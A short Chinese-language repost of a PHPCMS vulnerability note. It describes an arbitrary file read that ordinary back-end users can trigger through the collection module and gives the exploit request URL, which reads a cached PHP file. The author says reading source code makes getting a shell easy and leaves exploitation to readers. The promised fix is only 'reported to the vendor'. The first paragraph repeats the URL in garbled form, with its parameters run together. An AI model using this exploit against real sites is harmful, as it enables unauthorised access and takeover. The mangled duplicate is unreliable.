phpcms后台普通用户读文件0day的分析以及修复方法

概述后台采集里设置采集模块中title 或者其他的内容都可以 设置为 然后用下面的代码就可以读取到php的源了。 index.php?clientid=name_=1344175735957c=nodenodeid=1pc_hash=xxxx 拿到源基本拿到shell不难了。具体如何利用看大家自己了。（别跟我说只会读数据库

后台采集里设置采集模块中Title 或者其他的内容都可以 设置为 然后用下面的代码就可以读取到PHP的源了。 index.PHP?clIEntID=name&url=caches/caches_scan/caches_data/scan_bad_file.cache.PHP&_=1344175735957&m=collection&c=node&a=public_test_content&nodeID=1&pc_hash=xxxx 拿到源基本拿到shell不难了。具体如何利用看大家自己了。（别跟我说只会读数据库连接文件，并且还不能连），反正我是可以拿到shell。 修复：已提交给官方，等待补丁

内存溢出温馨提示：如果你正在寻找优秀的phpcms模板，那你可以到内存溢出的 PHPCMS模板 频道看看，相信一定有你喜欢的！

总结

以上是内存溢出为你收集整理的phpcms后台普通用户读文件0day的分析以及修复方法全部内容，希望文章能够帮你解决phpcms后台普通用户读文件0day的分析以及修复方法所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。